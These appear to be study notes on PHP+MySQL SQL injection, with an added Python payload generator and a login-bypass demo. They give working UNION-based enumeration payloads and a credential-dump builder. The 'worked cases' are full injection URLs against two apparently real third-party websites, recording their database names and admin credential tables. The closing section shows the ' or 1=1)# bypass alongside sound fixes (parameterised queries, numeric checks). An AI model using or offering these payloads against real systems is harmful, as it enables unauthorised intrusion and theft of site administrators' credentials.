Scripting language: PHP language basics (comments, input, debugging, accepting and processing submitted data)
SQL statements (query, insert, modify/update, etc.)
Exercise: write an SQL injection test page

PHP+MySQL injection (part 1)

How to see the submission method (GET or POST): in Firefox, right-click and choose Inspect Element; the request is shown under the Network tab.

To prevent SQL injection, change the corresponding statement so the parameter is checked before it is used: is_numeric() only allows a number to be entered.

Database commands on the command line:
  show databases;            show the database names
  show tables;               show the table names in the current database
  select * from <table>;     show the data in that table

Injection steps:
1. Find a page that takes a parameter.
2. Enter a malformed parameter and see whether the page errors. If it errors, there is an injection point.
3. Guess the number of fields (columns) with ORDER BY: change the number after "by" and narrow it down by binary search; the largest number that does not error is the number of columns.
4. For ASP (Access) injection skip this step, because Access has no database name and you guess the table name directly (e.g. admin). For PHP (MySQL) injection first extract the database name. If the statement does not error, make the original condition false so that only the UNION row is displayed, e.g. append "and 1=111" (or use a negative id such as id=-63, as in the examples below).
5. In the column numbers that are displayed on the page, replace the number with one of these functions: database() (database name), user() (database user), version() (database version), @@version_compile_os (server operating system).
6. Query the table names. information_schema.tables records the table names of all databases; query it with the condition table_schema=0x726f6f74, the hex encoding of the database name (here "root"). Specific statement:
   http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=0x726f6f74
   group_concat() dumps all the table names in one row. Then query the column names of the interesting table (here yzsoumember) from information_schema.columns, which records the column names of all tables in all databases. Specific example:
   http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x797a736f756d656d626572
   (0x797a736f756d656d626572 is the hex encoding of the table name "yzsoumember".)
7. The last step is the same as ASP injection: once the table name and column names are known, enter a statement that dumps the user name and password.

Data hierarchy:
  Access: database -> table name -> column name -> content
  MySQL:  database name -> table name -> column name -> content
  Example: mysql / information_schema / root -> yzsoumember -> username, password -> content

Differences:
- ASP+Access: the database file is stored in the site directory (it can be reached and downloaded); suffixes .mdb, .asp, .asa.
- PHP+MySQL: the database is stored under the MySQL installation path (not reachable through the web); suffixes .myi, .myd, .frm.
- ASP+Access injection is brute-force guessing; MySQL 5.0 and above has information_schema, which stores the table names and column names of all databases.
- database() database name, user() database user, version() database version, @@version_compile_os server operating system.
- Windows is case insensitive; Linux is case sensitive.

Worked cases recorded in the notes:
http://www.makita.com.cn   database mutia0121, table admin, columns name, adminpass
  http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x6d7574696130313231
  (0x6d7574696130313231 is the hex encoding of "mutia0121")
  http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x61646d696e
  (0x61646d696e is the hex encoding of "admin")
http://www.wh3z.cn   database hdm1040458_db, table intwho_admin_user, columns user_name, password
  http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=0x68646d313034303435385f6462
  (0x68646d313034303435385f6462 is the hex encoding of "hdm1040458_db")
  http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=0x696e7477686f5f61646d696e5f75736572
  (0x696e7477686f5f61646d696e5f75736572 is the hex encoding of "intwho_admin_user")
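The following is an added example, not part of the original notes, that builds the payloads used in steps 3 to 7 above: hex-encoding a database or table name into the 0x... literal, placing group_concat() in the column that is reflected on the page, and running the ORDER BY binary search for the column count. The page oracle is a constructed stand-in (a plain function), not a real HTTP request, and the URL builder does not URL-encode spaces.

```python
# Added example: MySQL UNION-based enumeration payloads as described in the notes.
# The oracle (page_errors) is a constructed stand-in for "does the page error?";
# against a real target it would be an HTTP request.

def mysql_hex(s: str) -> str:
    """Encode a name as a MySQL hex literal (0x...) so it can be used in
    WHERE table_schema=... without quotes, which a filter may strip."""
    return "0x" + s.encode("utf-8").hex()

def union_payload(columns: int, position: int, expression: str, from_clause: str = "") -> str:
    """Build 'UNION SELECT 1,...,<expression>,...,N [from ...]' with the
    expression placed at the column number that is reflected on the page."""
    if not 1 <= position <= columns:
        raise ValueError("position must be within 1..columns")
    cols = [str(i) for i in range(1, columns + 1)]
    cols[position - 1] = expression
    payload = "UNION SELECT " + ",".join(cols)
    if from_clause:
        payload += " " + from_clause
    return payload

def tables_payload(columns: int, position: int, db_name: str) -> str:
    """Step 6: list all table names of one database from information_schema.tables."""
    return union_payload(columns, position, "group_concat(table_name)",
                         f"from information_schema.tables where table_schema={mysql_hex(db_name)}")

def columns_payload(columns: int, position: int, table_name: str) -> str:
    """Step 6: list all column names of one table from information_schema.columns."""
    return union_payload(columns, position, "group_concat(column_name)",
                         f"from information_schema.columns where table_name={mysql_hex(table_name)}")

def data_payload(columns: int, position: int, table_name: str, column_names: list) -> str:
    """Step 7: dump the chosen columns; 0x3a is ':' used as a separator."""
    expr = "group_concat(" + ",0x3a,".join(column_names) + ")"
    return union_payload(columns, position, expr, f"from {table_name}")

def injection_url(base: str, param: str, value: str, payload: str, negate: str = "and 1=111") -> str:
    """Step 4: make the original WHERE false so only the UNION row is shown.
    Spaces are left as-is here; a real request would URL-encode them."""
    return f"{base}?{param}={value} {negate} {payload}"

def find_column_count(page_errors, max_columns: int = 100) -> int:
    """Step 3: binary-search the column count with ORDER BY n. page_errors(n)
    returns True when 'ORDER BY n' makes the page error, i.e. n > columns."""
    lo, hi = 1, max_columns
    if page_errors(lo):  # ORDER BY 1 can only fail if the injection does not work
        raise RuntimeError("ORDER BY 1 already errors; the injection point may not work")
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if page_errors(mid):
            hi = mid - 1
        else:
            lo = mid
    return lo

if __name__ == "__main__":
    # Constructed target: 18 columns, column 2 reflected, like the st1.com example.
    n = find_column_count(lambda k: k > 18)
    print(injection_url("http://www.st1.com/article.php", "id", "5", tables_payload(n, 2, "root")))
    print(injection_url("http://www.st1.com/article.php", "id", "5", columns_payload(n, 2, "yzsoumember")))
    print(injection_url("http://www.st1.com/article.php", "id", "5",
                        data_payload(n, 2, "yzsoumember", ["username", "password"])))
```

Running the script prints the three URLs in the same form as the notes; the hex literals it produces match the ones recorded there (0x726f6f74 for root, 0x797a736f756d656d626572 for yzsoumember).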
Outline: 1. Operations on two sites 2. Writing the PHP page; phpMyAdmin

You can change the query statement by entering a specific SQL fragment in the login submission field. For example, input admin' or 1=1)# and the query becomes
  select user from php where (user='admin' or 1=1)# ') and (pw='$pass')
Because # is the MySQL comment character, everything after it is ignored, so what actually runs is
  select user from php where (user='admin' or 1=1)
and the password check is never evaluated.
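The following is an added example, not part of the original notes, showing the login bypass above end to end: the vulnerable query built by string concatenation, the same query executed against a constructed in-memory SQLite table to show that every user is returned, and the two fixes the notes point at (a parameterised query, and an is_numeric-style check for numeric parameters). SQLite does not accept # as a comment, so the executed variant of the payload ends in "-- " instead; the MySQL form with # is kept as a string for comparison. The table name php and the sample rows are constructed.

```python
# Added example: login bypass with ' or 1=1)# and its fixes, run against SQLite.
import re
import sqlite3

MYSQL_BYPASS = "admin' or 1=1)#"     # payload from the notes (MySQL comment is #)
SQLITE_BYPASS = "admin' or 1=1)-- "  # same idea for SQLite, whose comment is --

def build_login_query(user: str, pw: str) -> str:
    """The vulnerable construction: user input is pasted into the SQL text."""
    return f"select user from php where (user='{user}') and (pw='{pw}')"

def make_db() -> sqlite3.Connection:
    """Constructed sample table, named after the query in the notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table php (user text, pw text)")
    conn.executemany("insert into php values (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn

def vulnerable_login(conn: sqlite3.Connection, user: str, pw: str) -> list:
    """Executes the concatenated query; the comment token cuts off the pw check."""
    rows = conn.execute(build_login_query(user, pw)).fetchall()
    return sorted(r[0] for r in rows)

def safe_login(conn: sqlite3.Connection, user: str, pw: str) -> list:
    """Fix 1: parameterised query. The quote and comment stay inside the value."""
    rows = conn.execute("select user from php where (user=?) and (pw=?)", (user, pw)).fetchall()
    return sorted(r[0] for r in rows)

def is_numeric_id(value: str) -> bool:
    """Fix 2 (for id-style parameters): the is_numeric-style check from the notes,
    written as a whole-string integer match so 'id=-63 UNION SELECT ...' is rejected."""
    return re.fullmatch(r"-?\d+", value) is not None

if __name__ == "__main__":
    print(build_login_query(MYSQL_BYPASS, "x"))
    conn = make_db()
    print("vulnerable:", vulnerable_login(conn, SQLITE_BYPASS, "wrong"))  # every user
    print("safe:      ", safe_login(conn, SQLITE_BYPASS, "wrong"))        # nobody
    print("safe, real creds:", safe_login(conn, "admin", "s3cret"))
    print(is_numeric_id("63"), is_numeric_id("-63 UNION SELECT 1"))
```

The parameterised version is the real fix for the login form; the numeric check only applies to parameters that must be integers, such as the article id in the earlier examples.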
Penetration Test 2